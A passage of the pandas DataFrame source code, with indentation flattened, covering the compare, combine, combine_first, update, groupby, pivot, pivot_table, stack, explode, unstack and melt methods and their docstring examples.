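#   ...     [("a", 1, True), ("b", 2, False)], names=["x", "y", "z"])
#   >>> df = pd.DataFrame({"v": [10, 20]}, index=idx)
#   >>> df.reorder_levels(["z", "x", "y"]).index.names
#   FrozenList(['z', 'x', 'y'])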
# ----------------------------------------------------------------------
# Arithmetic / combination related
def _combine_frame(self, other: DataFrame, func, fill_value=None):
# at this point we have `self._indexed_same(other)`
if fill_value is None:
# since _arith_op may be called in a loop, avoid function call
# overhead if possible by doing this check once
_arith_op = func
else:
def _arith_op(left, right):
# for the mixed_type case where we iterate over columns,
# _arith_op(left, right) is equivalent to
# left._binop(right, func, fill_value=fill_value)
left, right = ops.fill_binop(left, right, fill_value)
return func(left, right)
new_data = ops.dispatch_to_series(self, other, _arith_op)
return new_data
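# Minimal sketch of the ``fill_value`` handling above (hypothetical data, not
# part of the pandas source): positions where only one side is missing are
# filled before ``func`` is applied; positions missing on both sides stay NaN.
#
#   >>> a = pd.DataFrame({"x": [1.0, np.nan]})
#   >>> b = pd.DataFrame({"x": [10.0, 20.0]})
#   >>> a.add(b, fill_value=0)["x"].tolist()
#   [11.0, 20.0]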
def _construct_result(self, result) -> DataFrame:
"""
Wrap the result of an arithmetic, comparison, or logical operation.
Parameters
----------
result : DataFrame
Returns
-------
DataFrame
"""
out = self._constructor(result, copy=False)
# Pin columns instead of passing to constructor for compat with
# non-unique columns case
out.columns = self.columns
out.index = self.index
return out
@Appender(
"""
Returns
-------
DataFrame
DataFrame that shows the differences stacked side by side.
The resulting index will be a MultiIndex with 'self' and 'other'
stacked alternately at the inner level.
Raises
------
ValueError
When the two DataFrames don't have identical labels or shape.
See Also
--------
Series.compare : Compare with another Series and show differences.
DataFrame.equals : Test whether two objects contain the same elements.
Notes
-----
Matching NaNs will not appear as a difference.
Can only compare identically-labeled
(i.e. same shape, identical row and column labels) DataFrames.
Examples
--------
>>> df = pd.DataFrame(
... {
... "col1": ["a", "a", "b", "b", "a"],
... "col2": [1.0, 2.0, 3.0, np.nan, 5.0],
... "col3": [1.0, 2.0, 3.0, 4.0, 5.0]
... },
... columns=["col1", "col2", "col3"],
... )
>>> df
col1 col2 col3
0 a 1.0 1.0
1 a 2.0 2.0
2 b 3.0 3.0
3 b NaN 4.0
4 a 5.0 5.0
>>> df2 = df.copy()
>>> df2.loc[0, 'col1'] = 'c'
>>> df2.loc[2, 'col3'] = 4.0
>>> df2
col1 col2 col3
0 c 1.0 1.0
1 a 2.0 2.0
2 b 3.0 4.0
3 b NaN 4.0
4 a 5.0 5.0
Align the differences on columns
>>> df.compare(df2)
col1 col3
self other self other
0 a c NaN NaN
2 NaN NaN 3.0 4.0
Stack the differences on rows
>>> df.compare(df2, align_axis=0)
col1 col3
0 self a NaN
other c NaN
2 self NaN 3.0
other NaN 4.0
Keep the equal values
>>> df.compare(df2, keep_equal=True)
col1 col3
self other self other
0 a c 1.0 1.0
2 b b 3.0 4.0
Keep all original rows and columns
>>> df.compare(df2, keep_shape=True)
col1 col2 col3
self other self other self other
0 a c NaN NaN NaN NaN
1 NaN NaN NaN NaN NaN NaN
2 NaN NaN NaN NaN 3.0 4.0
3 NaN NaN NaN NaN NaN NaN
4 NaN NaN NaN NaN NaN NaN
Keep all original rows and columns and also all original values
>>> df.compare(df2, keep_shape=True, keep_equal=True)
col1 col2 col3
self other self other self other
0 a c 1.0 1.0 1.0 1.0
1 a a 2.0 2.0 2.0 2.0
2 b b 3.0 3.0 3.0 4.0
3 b b NaN NaN 4.0 4.0
4 a a 5.0 5.0 5.0 5.0
"""
)
@Appender(_shared_docs["compare"] % _shared_doc_kwargs)
def compare(
self,
other: DataFrame,
align_axis: Axis = 1,
keep_shape: bool = False,
keep_equal: bool = False,
) -> DataFrame:
return super().compare(
other=other,
align_axis=align_axis,
keep_shape=keep_shape,
keep_equal=keep_equal,
)
def combine(
self, other: DataFrame, func, fill_value=None, overwrite=True
) -> DataFrame:
"""
Perform column-wise combine with another DataFrame.
Combines a DataFrame with `other` DataFrame using `func`
to element-wise combine columns. The row and column indexes of the
resulting DataFrame will be the union of the two.
Parameters
----------
other : DataFrame
The DataFrame to merge column-wise.
func : function
Function that takes two series as inputs and return a Series or a
            scalar. Used to merge the two dataframes column by column.
fill_value : scalar value, default None
The value to fill NaNs with prior to passing any column to the
merge func.
overwrite : bool, default True
If True, columns in `self` that do not exist in `other` will be
overwritten with NaNs.
Returns
-------
DataFrame
Combination of the provided DataFrames.
See Also
--------
DataFrame.combine_first : Combine two DataFrame objects and default to
non-null values in frame calling the method.
Examples
--------
Combine using a simple function that chooses the smaller column.
>>> df1 = pd.DataFrame({'A': [0, 0], 'B': [4, 4]})
>>> df2 = pd.DataFrame({'A': [1, 1], 'B': [3, 3]})
>>> take_smaller = lambda s1, s2: s1 if s1.sum() < s2.sum() else s2
>>> df1.combine(df2, take_smaller)
A B
0 0 3
1 0 3
Example using a true element-wise combine function.
>>> df1 = pd.DataFrame({'A': [5, 0], 'B': [2, 4]})
>>> df2 = pd.DataFrame({'A': [1, 1], 'B': [3, 3]})
>>> df1.combine(df2, np.minimum)
A B
0 1 2
1 0 3
        Using `fill_value` fills `None` values prior to passing the column to the
merge function.
>>> df1 = pd.DataFrame({'A': [0, 0], 'B': [None, 4]})
>>> df2 = pd.DataFrame({'A': [1, 1], 'B': [3, 3]})
>>> df1.combine(df2, take_smaller, fill_value=-5)
A B
0 0 -5.0
1 0 4.0
However, if the same element in both dataframes is None, that None
is preserved
>>> df1 = pd.DataFrame({'A': [0, 0], 'B': [None, 4]})
>>> df2 = pd.DataFrame({'A': [1, 1], 'B': [None, 3]})
>>> df1.combine(df2, take_smaller, fill_value=-5)
A B
0 0 -5.0
1 0 3.0
Example that demonstrates the use of `overwrite` and behavior when
the axis differ between the dataframes.
>>> df1 = pd.DataFrame({'A': [0, 0], 'B': [4, 4]})
>>> df2 = pd.DataFrame({'B': [3, 3], 'C': [-10, 1], }, index=[1, 2])
>>> df1.combine(df2, take_smaller)
A B C
0 NaN NaN NaN
1 NaN 3.0 -10.0
2 NaN 3.0 1.0
>>> df1.combine(df2, take_smaller, overwrite=False)
A B C
0 0.0 NaN NaN
1 0.0 3.0 -10.0
2 NaN 3.0 1.0
Demonstrating the preference of the passed in dataframe.
>>> df2 = pd.DataFrame({'B': [3, 3], 'C': [1, 1], }, index=[1, 2])
>>> df2.combine(df1, take_smaller)
A B C
0 0.0 NaN NaN
1 0.0 3.0 NaN
2 NaN 3.0 NaN
>>> df2.combine(df1, take_smaller, overwrite=False)
A B C
0 0.0 NaN NaN
1 0.0 3.0 1.0
2 NaN 3.0 1.0
"""
other_idxlen = len(other.index) # save for compare
this, other = self.align(other, copy=False)
new_index = this.index
if other.empty and len(new_index) == len(self.index):
return self.copy()
if self.empty and len(other) == other_idxlen:
return other.copy()
# sorts if possible
new_columns = this.columns.union(other.columns)
do_fill = fill_value is not None
result = {}
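        # Combine column by column: for each column, align dtypes, optionally
        # fill missing values, apply ``func``, then try to downcast the result
        # back to the original dtype.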
for col in new_columns:
series = this[col]
otherSeries = other[col]
this_dtype = series.dtype
other_dtype = otherSeries.dtype
this_mask = isna(series)
other_mask = isna(otherSeries)
# don't overwrite columns unnecessarily
# DO propagate if this column is not in the intersection
if not overwrite and other_mask.all():
result[col] = this[col].copy()
continue
if do_fill:
series = series.copy()
otherSeries = otherSeries.copy()
series[this_mask] = fill_value
otherSeries[other_mask] = fill_value
if col not in self.columns:
# If self DataFrame does not have col in other DataFrame,
# try to promote series, which is all NaN, as other_dtype.
new_dtype = other_dtype
try:
series = series.astype(new_dtype, copy=False)
except ValueError:
# e.g. new_dtype is integer types
pass
else:
# if we have different dtypes, possibly promote
new_dtype = find_common_type([this_dtype, other_dtype])
if not is_dtype_equal(this_dtype, new_dtype):
series = series.astype(new_dtype)
if not is_dtype_equal(other_dtype, new_dtype):
otherSeries = otherSeries.astype(new_dtype)
arr = func(series, otherSeries)
arr = maybe_downcast_to_dtype(arr, this_dtype)
result[col] = arr
# convert_objects just in case
return self._constructor(result, index=new_index, columns=new_columns)
def combine_first(self, other: DataFrame) -> DataFrame:
"""
Update null elements with value in the same location in `other`.
Combine two DataFrame objects by filling null values in one DataFrame
with non-null values from other DataFrame. The row and column indexes
of the resulting DataFrame will be the union of the two.
Parameters
----------
other : DataFrame
Provided DataFrame to use to fill null values.
Returns
-------
DataFrame
See Also
--------
DataFrame.combine : Perform series-wise operation on two DataFrames
using a given function.
Examples
--------
>>> df1 = pd.DataFrame({'A': [None, 0], 'B': [None, 4]})
>>> df2 = pd.DataFrame({'A': [1, 1], 'B': [3, 3]})
>>> df1.combine_first(df2)
A B
0 1.0 3.0
1 0.0 4.0
Null values still persist if the location of that null value
does not exist in `other`
>>> df1 = pd.DataFrame({'A': [None, 0], 'B': [4, None]})
>>> df2 = pd.DataFrame({'B': [3, 3], 'C': [1, 1]}, index=[1, 2])
>>> df1.combine_first(df2)
A B C
0 NaN 4.0 NaN
1 0.0 3.0 1.0
2 NaN 3.0 1.0
"""
import pandas.core.computation.expressions as expressions
def extract_values(arr):
# Does two things:
# 1. maybe gets the values from the Series / Index
# 2. convert datelike to i8
# TODO: extract_array?
if isinstance(arr, (Index, Series)):
arr = arr._values
if needs_i8_conversion(arr.dtype):
if is_extension_array_dtype(arr.dtype):
arr = arr.asi8
else:
arr = arr.view("i8")
return arr
def combiner(x, y):
mask = isna(x)
# TODO: extract_array?
if isinstance(mask, (Index, Series)):
mask = mask._values
x_values = extract_values(x)
y_values = extract_values(y)
# If the column y in other DataFrame is not in first DataFrame,
# just return y_values.
if y.name not in self.columns:
return y_values
return expressions.where(mask, y_values, x_values)
return self.combine(other, combiner, overwrite=False)
def update(
self, other, join="left", overwrite=True, filter_func=None, errors="ignore"
) -> None:
"""
Modify in place using non-NA values from another DataFrame.
Aligns on indices. There is no return value.
Parameters
----------
other : DataFrame, or object coercible into a DataFrame
Should have at least one matching index/column label
with the original DataFrame. If a Series is passed,
its name attribute must be set, and that will be
used as the column name to align with the original DataFrame.
join : {'left'}, default 'left'
Only left join is implemented, keeping the index and columns of the
original object.
overwrite : bool, default True
How to handle non-NA values for overlapping keys:
* True: overwrite original DataFrame's values
with values from `other`.
* False: only update values that are NA in
the original DataFrame.
filter_func : callable(1d-array) -> bool 1d-array, optional
Can choose to replace values other than NA. Return True for values
that should be updated.
errors : {'raise', 'ignore'}, default 'ignore'
If 'raise', will raise a ValueError if the DataFrame and `other`
both contain non-NA data in the same place.
.. versionchanged:: 0.24.0
Changed from `raise_conflict=False|True`
to `errors='ignore'|'raise'`.
Returns
-------
None : method directly changes calling object
Raises
------
ValueError
* When `errors='raise'` and there's overlapping non-NA data.
* When `errors` is not either `'ignore'` or `'raise'`
NotImplementedError
* If `join != 'left'`
See Also
--------
dict.update : Similar method for dictionaries.
DataFrame.merge : For column(s)-on-columns(s) operations.
Examples
--------
>>> df = pd.DataFrame({'A': [1, 2, 3],
... 'B': [400, 500, 600]})
>>> new_df = pd.DataFrame({'B': [4, 5, 6],
... 'C': [7, 8, 9]})
>>> df.update(new_df)
>>> df
A B
0 1 4
1 2 5
2 3 6
The DataFrame's length does not increase as a result of the update,
only values at matching index/column labels are updated.
>>> df = pd.DataFrame({'A': ['a', 'b', 'c'],
... 'B': ['x', 'y', 'z']})
>>> new_df = pd.DataFrame({'B': ['d', 'e', 'f', 'g', 'h', 'i']})
>>> df.update(new_df)
>>> df
A B
0 a d
1 b e
2 c f
        For Series, its name attribute must be set.
>>> df = pd.DataFrame({'A': ['a', 'b', 'c'],
... 'B': ['x', 'y', 'z']})
>>> new_column = pd.Series(['d', 'e'], name='B', index=[0, 2])
>>> df.update(new_column)
>>> df
A B
0 a d
1 b y
2 c e
>>> df = pd.DataFrame({'A': ['a', 'b', 'c'],
... 'B': ['x', 'y', 'z']})
>>> new_df = pd.DataFrame({'B': ['d', 'e']}, index=[1, 2])
>>> df.update(new_df)
>>> df
A B
0 a x
1 b d
2 c e
If `other` contains NaNs the corresponding values are not updated
in the original dataframe.
>>> df = pd.DataFrame({'A': [1, 2, 3],
... 'B': [400, 500, 600]})
>>> new_df = pd.DataFrame({'B': [4, np.nan, 6]})
>>> df.update(new_df)
>>> df
A B
0 1 4.0
1 2 500.0
2 3 6.0
"""
import pandas.core.computation.expressions as expressions
# TODO: Support other joins
if join != "left": # pragma: no cover
raise NotImplementedError("Only left join is supported")
if errors not in ["ignore", "raise"]:
raise ValueError("The parameter errors must be either 'ignore' or 'raise'")
if not isinstance(other, DataFrame):
other = DataFrame(other)
other = other.reindex_like(self)
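        # For each column, ``mask`` marks the positions whose original values
        # are kept; everything else is taken from ``other``.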
for col in self.columns:
this = self[col]._values
that = other[col]._values
if filter_func is not None:
with np.errstate(all="ignore"):
mask = ~filter_func(this) | isna(that)
else:
if errors == "raise":
mask_this = notna(that)
mask_that = notna(this)
if any(mask_this & mask_that):
raise ValueError("Data overlaps.")
if overwrite:
mask = isna(that)
else:
mask = notna(this)
# don't overwrite columns unnecessarily
if mask.all():
continue
self[col] = expressions.where(mask, this, that)
# ----------------------------------------------------------------------
# Data reshaping
@Appender(
"""
Examples
--------
>>> df = pd.DataFrame({'Animal': ['Falcon', 'Falcon',
... 'Parrot', 'Parrot'],
... 'Max Speed': [380., 370., 24., 26.]})
>>> df
Animal Max Speed
0 Falcon 380.0
1 Falcon 370.0
2 Parrot 24.0
3 Parrot 26.0
>>> df.groupby(['Animal']).mean()
Max Speed
Animal
Falcon 375.0
Parrot 25.0
**Hierarchical Indexes**
We can groupby different levels of a hierarchical index
using the `level` parameter:
>>> arrays = [['Falcon', 'Falcon', 'Parrot', 'Parrot'],
... ['Captive', 'Wild', 'Captive', 'Wild']]
>>> index = pd.MultiIndex.from_arrays(arrays, names=('Animal', 'Type'))
>>> df = pd.DataFrame({'Max Speed': [390., 350., 30., 20.]},
... index=index)
>>> df
Max Speed
Animal Type
Falcon Captive 390.0
Wild 350.0
Parrot Captive 30.0
Wild 20.0
>>> df.groupby(level=0).mean()
Max Speed
Animal
Falcon 370.0
Parrot 25.0
>>> df.groupby(level="Type").mean()
Max Speed
Type
Captive 210.0
Wild 185.0
We can also choose to include NA in group keys or not by setting
`dropna` parameter, the default setting is `True`:
>>> l = [[1, 2, 3], [1, None, 4], [2, 1, 3], [1, 2, 2]]
>>> df = pd.DataFrame(l, columns=["a", "b", "c"])
>>> df.groupby(by=["b"]).sum()
a c
b
1.0 2 3
2.0 2 5
>>> df.groupby(by=["b"], dropna=False).sum()
a c
b
1.0 2 3
2.0 2 5
NaN 1 4
>>> l = [["a", 12, 12], [None, 12.3, 33.], ["b", 12.3, 123], ["a", 1, 1]]
>>> df = pd.DataFrame(l, columns=["a", "b", "c"])
>>> df.groupby(by="a").sum()
b c
a
a 13.0 13.0
b 12.3 123.0
>>> df.groupby(by="a", dropna=False).sum()
b c
a
a 13.0 13.0
b 12.3 123.0
NaN 12.3 33.0
"""
)
@Appender(_shared_docs["groupby"] % _shared_doc_kwargs)
def groupby(
self,
by=None,
axis=0,
level=None,
as_index: bool = True,
sort: bool = True,
group_keys: bool = True,
squeeze: bool = no_default,
observed: bool = False,
dropna: bool = True,
) -> DataFrameGroupBy:
from pandas.core.groupby.generic import DataFrameGroupBy
if squeeze is not no_default:
warnings.warn(
(
"The `squeeze` parameter is deprecated and "
"will be removed in a future version."
),
FutureWarning,
stacklevel=2,
)
else:
squeeze = False
if level is None and by is None:
raise TypeError("You have to supply one of 'by' and 'level'")
axis = self._get_axis_number(axis)
return DataFrameGroupBy(
obj=self,
keys=by,
axis=axis,
level=level,
as_index=as_index,
sort=sort,
group_keys=group_keys,
squeeze=squeeze,
observed=observed,
dropna=dropna,
)
_shared_docs[
"pivot"
] = """
Return reshaped DataFrame organized by given index / column values.
Reshape data (produce a "pivot" table) based on column values. Uses
unique values from specified `index` / `columns` to form axes of the
resulting DataFrame. This function does not support data
aggregation, multiple values will result in a MultiIndex in the
columns. See the :ref:`User Guide <reshaping>` for more on reshaping.
Parameters
----------%s
index : str or object or a list of str, optional
Column to use to make new frame's index. If None, uses
existing index.
.. versionchanged:: 1.1.0
Also accept list of index names.
columns : str or object or a list of str
Column to use to make new frame's columns.
.. versionchanged:: 1.1.0
Also accept list of columns names.
values : str, object or a list of the previous, optional
Column(s) to use for populating new frame's values. If not
specified, all remaining columns will be used and the result will
have hierarchically indexed columns.
Returns
-------
DataFrame
Returns reshaped DataFrame.
Raises
------
ValueError:
When there are any `index`, `columns` combinations with multiple
            values. Use `DataFrame.pivot_table` when you need to aggregate.
See Also
--------
DataFrame.pivot_table : Generalization of pivot that can handle
duplicate values for one index/column pair.
DataFrame.unstack : Pivot based on the index values instead of a
column.
wide_to_long : Wide panel to long format. Less flexible but more
user-friendly than melt.
Notes
-----
For finer-tuned control, see hierarchical indexing documentation along
with the related stack/unstack methods.
Examples
--------
>>> df = pd.DataFrame({'foo': ['one', 'one', 'one', 'two', 'two',
... 'two'],
... 'bar': ['A', 'B', 'C', 'A', 'B', 'C'],
... 'baz': [1, 2, 3, 4, 5, 6],
... 'zoo': ['x', 'y', 'z', 'q', 'w', 't']})
>>> df
foo bar baz zoo
0 one A 1 x
1 one B 2 y
2 one C 3 z
3 two A 4 q
4 two B 5 w
5 two C 6 t
>>> df.pivot(index='foo', columns='bar', values='baz')
bar A B C
foo
one 1 2 3
two 4 5 6
>>> df.pivot(index='foo', columns='bar')['baz']
bar A B C
foo
one 1 2 3
two 4 5 6
>>> df.pivot(index='foo', columns='bar', values=['baz', 'zoo'])
baz zoo
bar A B C A B C
foo
one 1 2 3 x y z
two 4 5 6 q w t
You could also assign a list of column names or a list of index names.
>>> df = pd.DataFrame({
... "lev1": [1, 1, 1, 2, 2, 2],
... "lev2": [1, 1, 2, 1, 1, 2],
... "lev3": [1, 2, 1, 2, 1, 2],
... "lev4": [1, 2, 3, 4, 5, 6],
... "values": [0, 1, 2, 3, 4, 5]})
>>> df
lev1 lev2 lev3 lev4 values
0 1 1 1 1 0
1 1 1 2 2 1
2 1 2 1 3 2
3 2 1 2 4 3
4 2 1 1 5 4
5 2 2 2 6 5
    >>> df.pivot(index="lev1", columns=["lev2", "lev3"], values="values")
lev2 1 2
lev3 1 2 1 2
lev1
1 0.0 1.0 2.0 NaN
2 4.0 3.0 NaN 5.0
    >>> df.pivot(index=["lev1", "lev2"], columns=["lev3"], values="values")
lev3 1 2
lev1 lev2
1 1 0.0 1.0
2 2.0 NaN
2 1 4.0 3.0
2 NaN 5.0
A ValueError is raised if there are any duplicates.
>>> df = pd.DataFrame({"foo": ['one', 'one', 'two', 'two'],
... "bar": ['A', 'A', 'B', 'C'],
... "baz": [1, 2, 3, 4]})
>>> df
foo bar baz
0 one A 1
1 one A 2
2 two B 3
3 two C 4
Notice that the first two rows are the same for our `index`
and `columns` arguments.
>>> df.pivot(index='foo', columns='bar', values='baz')
Traceback (most recent call last):
...
ValueError: Index contains duplicate entries, cannot reshape
"""
@Substitution("")
@Appender(_shared_docs["pivot"])
def pivot(self, index=None, columns=None, values=None) -> DataFrame:
from pandas.core.reshape.pivot import pivot
return pivot(self, index=index, columns=columns, values=values)
_shared_docs[
"pivot_table"
] = """
Create a spreadsheet-style pivot table as a DataFrame.
The levels in the pivot table will be stored in MultiIndex objects
(hierarchical indexes) on the index and columns of the result DataFrame.
Parameters
----------%s
values : column to aggregate, optional
index : column, Grouper, array, or list of the previous
If an array is passed, it must be the same length as the data. The
list can contain any of the other types (except list).
Keys to group by on the pivot table index. If an array is passed,
        it is used in the same manner as column values.
columns : column, Grouper, array, or list of the previous
If an array is passed, it must be the same length as the data. The
list can contain any of the other types (except list).
Keys to group by on the pivot table column. If an array is passed,
        it is used in the same manner as column values.
aggfunc : function, list of functions, dict, default numpy.mean
If list of functions passed, the resulting pivot table will have
        hierarchical columns whose top level contains the function names
        (inferred from the function objects themselves).
If dict is passed, the key is column to aggregate and value
is function or list of functions.
fill_value : scalar, default None
Value to replace missing values with (in the resulting pivot table,
after aggregation).
margins : bool, default False
Add all row / columns (e.g. for subtotal / grand totals).
dropna : bool, default True
Do not include columns whose entries are all NaN.
margins_name : str, default 'All'
Name of the row / column that will contain the totals
when margins is True.
observed : bool, default False
This only applies if any of the groupers are Categoricals.
If True: only show observed values for categorical groupers.
If False: show all values for categorical groupers.
.. versionchanged:: 0.25.0
Returns
-------
DataFrame
An Excel style pivot table.
See Also
--------
DataFrame.pivot : Pivot without aggregation that can handle
non-numeric data.
DataFrame.melt: Unpivot a DataFrame from wide to long format,
optionally leaving identifiers set.
wide_to_long : Wide panel to long format. Less flexible but more
user-friendly than melt.
Examples
--------
>>> df = pd.DataFrame({"A": ["foo", "foo", "foo", "foo", "foo",
... "bar", "bar", "bar", "bar"],
... "B": ["one", "one", "one", "two", "two",
... "one", "one", "two", "two"],
... "C": ["small", "large", "large", "small",
... "small", "large", "small", "small",
... "large"],
... "D": [1, 2, 2, 3, 3, 4, 5, 6, 7],
... "E": [2, 4, 5, 5, 6, 6, 8, 9, 9]})
>>> df
A B C D E
0 foo one small 1 2
1 foo one large 2 4
2 foo one large 2 5
3 foo two small 3 5
4 foo two small 3 6
5 bar one large 4 6
6 bar one small 5 8
7 bar two small 6 9
8 bar two large 7 9
This first example aggregates values by taking the sum.
>>> table = pd.pivot_table(df, values='D', index=['A', 'B'],
... columns=['C'], aggfunc=np.sum)
>>> table
C large small
A B
bar one 4.0 5.0
two 7.0 6.0
foo one 4.0 1.0
two NaN 6.0
We can also fill missing values using the `fill_value` parameter.
>>> table = pd.pivot_table(df, values='D', index=['A', 'B'],
... columns=['C'], aggfunc=np.sum, fill_value=0)
>>> table
C large small
A B
bar one 4 5
two 7 6
foo one 4 1
two 0 6
The next example aggregates by taking the mean across multiple columns.
>>> table = pd.pivot_table(df, values=['D', 'E'], index=['A', 'C'],
... aggfunc={'D': np.mean,
... 'E': np.mean})
>>> table
D E
A C
bar large 5.500000 7.500000
small 5.500000 8.500000
foo large 2.000000 4.500000
small 2.333333 4.333333
We can also calculate multiple types of aggregations for any given
value column.
>>> table = pd.pivot_table(df, values=['D', 'E'], index=['A', 'C'],
... aggfunc={'D': np.mean,
... 'E': [min, max, np.mean]})
>>> table
D E
mean max mean min
A C
bar large 5.500000 9.0 7.500000 6.0
small 5.500000 9.0 8.500000 8.0
foo large 2.000000 5.0 4.500000 4.0
small 2.333333 6.0 4.333333 2.0
"""
@Substitution("")
@Appender(_shared_docs["pivot_table"])
def pivot_table(
self,
values=None,
index=None,
columns=None,
aggfunc="mean",
fill_value=None,
margins=False,
dropna=True,
margins_name="All",
observed=False,
) -> DataFrame:
from pandas.core.reshape.pivot import pivot_table
return pivot_table(
self,
values=values,
index=index,
columns=columns,
aggfunc=aggfunc,
fill_value=fill_value,
margins=margins,
dropna=dropna,
margins_name=margins_name,
observed=observed,
)
def stack(self, level=-1, dropna=True):
"""
Stack the prescribed level(s) from columns to index.
Return a reshaped DataFrame or Series having a multi-level
index with one or more new inner-most levels compared to the current
DataFrame. The new inner-most levels are created by pivoting the
columns of the current dataframe:
- if the columns have a single level, the output is a Series;
- if the columns have multiple levels, the new index
level(s) is (are) taken from the prescribed level(s) and
the output is a DataFrame.
Parameters
----------
level : int, str, list, default -1
Level(s) to stack from the column axis onto the index
axis, defined as one index or label, or a list of indices
or labels.
dropna : bool, default True
Whether to drop rows in the resulting Frame/Series with
missing values. Stacking a column level onto the index
axis can create combinations of index and column values
that are missing from the original dataframe. See Examples
section.
Returns
-------
DataFrame or Series
Stacked dataframe or series.
See Also
--------
DataFrame.unstack : Unstack prescribed level(s) from index axis
onto column axis.
DataFrame.pivot : Reshape dataframe from long format to wide
format.
DataFrame.pivot_table : Create a spreadsheet-style pivot table
as a DataFrame.
Notes
-----
The function is named by analogy with a collection of books
being reorganized from being side by side on a horizontal
position (the columns of the dataframe) to being stacked
vertically on top of each other (in the index of the
dataframe).
Examples
--------
**Single level columns**
>>> df_single_level_cols = pd.DataFrame([[0, 1], [2, 3]],
... index=['cat', 'dog'],
... columns=['weight', 'height'])
Stacking a dataframe with a single level column axis returns a Series:
>>> df_single_level_cols
weight height
cat 0 1
dog 2 3
>>> df_single_level_cols.stack()
cat weight 0
height 1
dog weight 2
height 3
dtype: int64
**Multi level columns: simple case**
>>> multicol1 = pd.MultiIndex.from_tuples([('weight', 'kg'),
... ('weight', 'pounds')])
>>> df_multi_level_cols1 = pd.DataFrame([[1, 2], [2, 4]],
... index=['cat', 'dog'],
... columns=multicol1)
Stacking a dataframe with a multi-level column axis:
>>> df_multi_level_cols1
weight
kg pounds
cat 1 2
dog 2 4
>>> df_multi_level_cols1.stack()
weight
cat kg 1
pounds 2
dog kg 2
pounds 4
**Missing values**
>>> multicol2 = pd.MultiIndex.from_tuples([('weight', 'kg'),
... ('height', 'm')])
>>> df_multi_level_cols2 = pd.DataFrame([[1.0, 2.0], [3.0, 4.0]],
... index=['cat', 'dog'],
... columns=multicol2)
It is common to have missing values when stacking a dataframe
with multi-level columns, as the stacked dataframe typically
has more values than the original dataframe. Missing values
are filled with NaNs:
>>> df_multi_level_cols2
weight height
kg m
cat 1.0 2.0
dog 3.0 4.0
>>> df_multi_level_cols2.stack()
height weight
cat kg NaN 1.0
m 2.0 NaN
dog kg NaN 3.0
m 4.0 NaN
**Prescribing the level(s) to be stacked**
The first parameter controls which level or levels are stacked:
>>> df_multi_level_cols2.stack(0)
kg m
cat height NaN 2.0
weight 1.0 NaN
dog height NaN 4.0
weight 3.0 NaN
>>> df_multi_level_cols2.stack([0, 1])
cat height m 2.0
weight kg 1.0
dog height m 4.0
weight kg 3.0
dtype: float64
**Dropping missing values**
>>> df_multi_level_cols3 = pd.DataFrame([[None, 1.0], [2.0, 3.0]],
... index=['cat', 'dog'],
... columns=multicol2)
Note that rows where all values are missing are dropped by
default but this behaviour can be controlled via the dropna
keyword parameter:
>>> df_multi_level_cols3
weight height
kg m
cat NaN 1.0
dog 2.0 3.0
>>> df_multi_level_cols3.stack(dropna=False)
height weight
cat kg NaN NaN
m 1.0 NaN
dog kg NaN 2.0
m 3.0 NaN
>>> df_multi_level_cols3.stack(dropna=True)
height weight
cat m 1.0 NaN
dog kg NaN 2.0
m 3.0 NaN
"""
from pandas.core.reshape.reshape import stack, stack_multiple
if isinstance(level, (tuple, list)):
return stack_multiple(self, level, dropna=dropna)
else:
return stack(self, level, dropna=dropna)
def explode(
self, column: Union[str, Tuple], ignore_index: bool = False
) -> DataFrame:
"""
Transform each element of a list-like to a row, replicating index values.
.. versionadded:: 0.25.0
Parameters
----------
column : str or tuple
Column to explode.
ignore_index : bool, default False
If True, the resulting index will be labeled 0, 1, …, n - 1.
.. versionadded:: 1.1.0
Returns
-------
DataFrame
Exploded lists to rows of the subset columns;
index will be duplicated for these rows.
Raises
------
ValueError :
if columns of the frame are not unique.
See Also
--------
DataFrame.unstack : Pivot a level of the (necessarily hierarchical)
index labels.
DataFrame.melt : Unpivot a DataFrame from wide format to long format.
        Series.explode : Explode a Series from list-like values to long format.
Notes
-----
This routine will explode list-likes including lists, tuples, sets,
Series, and np.ndarray. The result dtype of the subset rows will
be object. Scalars will be returned unchanged, and empty list-likes will
result in a np.nan for that row. In addition, the ordering of rows in the
output will be non-deterministic when exploding sets.
Examples
--------
>>> df = pd.DataFrame({'A': [[1, 2, 3], 'foo', [], [3, 4]], 'B': 1})
>>> df
A B
0 [1, 2, 3] 1
1 foo 1
2 [] 1
3 [3, 4] 1
>>> df.explode('A')
A B
0 1 1
0 2 1
0 3 1
1 foo 1
2 NaN 1
3 3 1
3 4 1
"""
if not (is_scalar(column) or isinstance(column, tuple)):
raise ValueError("column must be a scalar")
if not self.columns.is_unique:
raise ValueError("columns must be unique")
df = self.reset_index(drop=True)
# TODO: use overload to refine return type of reset_index
assert df is not None # needed for mypy
result = df[column].explode()
result = df.drop([column], axis=1).join(result)
if ignore_index:
result.index = ibase.default_index(len(result))
else:
result.index = self.index.take(result.index)
result = result.reindex(columns=self.columns, copy=False)
return result
def unstack(self, level=-1, fill_value=None):
"""
Pivot a level of the (necessarily hierarchical) index labels.
Returns a DataFrame having a new level of column labels whose inner-most level
consists of the pivoted index labels.
If the index is not a MultiIndex, the output will be a Series
(the analogue of stack when the columns are not a MultiIndex).
Parameters
----------
level : int, str, or list of these, default -1 (last level)
Level(s) of index to unstack, can pass level name.
fill_value : int, str or dict
Replace NaN with this value if the unstack produces missing values.
Returns
-------
Series or DataFrame
See Also
--------
DataFrame.pivot : Pivot a table based on column values.
DataFrame.stack : Pivot a level of the column labels (inverse operation
from `unstack`).
Examples
--------
>>> index = pd.MultiIndex.from_tuples([('one', 'a'), ('one', 'b'),
... ('two', 'a'), ('two', 'b')])
>>> s = pd.Series(np.arange(1.0, 5.0), index=index)
>>> s
one a 1.0
b 2.0
two a 3.0
b 4.0
dtype: float64
>>> s.unstack(level=-1)
a b
one 1.0 2.0
two 3.0 4.0
>>> s.unstack(level=0)
one two
a 1.0 3.0
b 2.0 4.0
>>> df = s.unstack(level=0)
>>> df.unstack()
one a 1.0
b 2.0
two a 3.0
b 4.0
dtype: float64
"""
from pandas.core.reshape.reshape import unstack
return unstack(self, level, fill_value)
@Appender(_shared_docs["melt"] % dict(caller="df.melt(", other="melt"))
def melt(
self,
id_vars=None,
value_vars=None,
var_name=None,
value_name="value",
col_level=None,
ignore_index=True,
) -> DataFrame:
return melt(
self,
id_vars=id_vars,
value_vars=value_vars,
var_name=var_name,
value_name=value_name,
col_level=col_level,
ignore_index=ignore_index,
)
# ----------------------------------------------------------------------
# Time series-related
@doc(
Series.diff,
        klass="DataFrame",
extra_params="axis : {0 or 'index', 1 or 'columns'}, default 0\n "
"Take difference over rows (0) or columns (1).\n",
other_klass="Series",
examples=dedent(
"""
